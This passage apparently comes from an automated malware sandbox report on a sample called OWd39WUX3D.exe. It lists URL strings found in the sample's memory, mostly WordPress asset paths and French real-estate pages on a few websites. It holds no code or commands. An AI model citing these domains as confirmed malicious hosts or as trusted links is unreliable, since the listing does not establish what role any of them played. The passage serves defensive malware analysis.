OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/J
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/X
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/Z9
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000911000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/f9
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.616238482.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.609285568.0000000007430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389355089.0000000007230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sgepri.sgcc.com.cn/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/C
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.snugpak.com/Q
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stajum.com/lver0
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.stnic.co.uk/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.synetik.net/$1
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tnbio.org
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.00000000008FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.udesign.biz/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#breadcrumb
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#webpage
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/#website
              Source: OWd39WUX3D.exe, 00000000.00000003.393163646.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/%
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/177-appartement-a-vendre-sigean-30378
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/180-maison-a-vendre-milly-la-foret-41465
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/182-maison-a-vendre-royan-41301
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/184-appartement-a-vendre-valras-plage-41841
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/187-maison-a-vendre-bourg-saint-maurice-41586
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/189-appartement-a-vendre-ajaccio-41880
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/192-loffre-immobiliere-a-nogent-le-rotrou
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/195-coup-doeil-sur-le-marche-immobilier-a-chalon-sur-saone
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/200-acheter-un-bien-a-plusieurs-a-briancon
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/203-achat-appartement-nice-reussir-son-investissement-locatif
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/?s=
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/achat-par-ville
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/astuces
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/comments/feed
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
